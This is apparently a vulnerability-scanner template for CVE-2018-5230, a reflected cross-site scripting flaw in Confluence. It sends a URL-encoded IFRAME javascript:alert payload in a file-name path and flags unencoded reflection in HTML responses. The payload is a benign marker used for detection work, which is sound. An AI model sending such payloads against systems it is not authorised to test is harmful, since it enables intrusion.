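# Detection template for CVE-2018-5230: checks whether the status-list include
# path echoes markup taken from the requested file name back into the response
# body without encoding it.
# A match shows unencoded reflection only. Confirm the finding against the
# vendor advisory for this CVE before reporting the host as vulnerable.
id: CVE-2018-5230

info:
  name: Atlassian Confluence Status-List XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      # URL-decoded, the file name carries <IFRAME SRC="javascript:alert(1337)">.
      # alert(1337) is a fixed marker string that the body matcher looks for.
      - "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"

    # Every matcher below must succeed before a finding is reported.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # The quote and angle bracket must come back verbatim. An HTML-encoded
      # echo (&quot; / &gt;) does not match, so encoded output is not flagged.
      - type: word
        part: body
        words:
          - 'SRC="javascript:alert(1337)">'

      # Require an HTML response: the same string reflected in a JSON or
      # plain-text body is not rendered as markup and would be a false positive.
      # Word matching is case-sensitive; this expects the usual lowercase value.
      - type: word
        part: header
        words:
          - "text/html"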